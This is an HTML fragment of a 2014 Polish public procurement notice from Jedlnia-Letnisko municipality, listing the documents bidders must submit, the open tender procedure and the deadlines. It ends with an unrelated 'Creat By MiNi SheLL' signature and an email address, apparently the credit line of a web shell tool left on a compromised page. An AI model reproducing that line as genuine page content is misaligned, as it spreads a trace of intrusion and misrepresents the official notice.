<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jedlnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Jedlni-Letnisko ul. Radomska 43; 26-630 Jedlnia-Letnisko..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2014 godzina 10:00, miejsce: Urząd Gminy w Jedlni-Letnisko ul. Radomska 43; 26-630 Jedlnia-Letnisko; Biuro Obsługi Mieszkańca..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com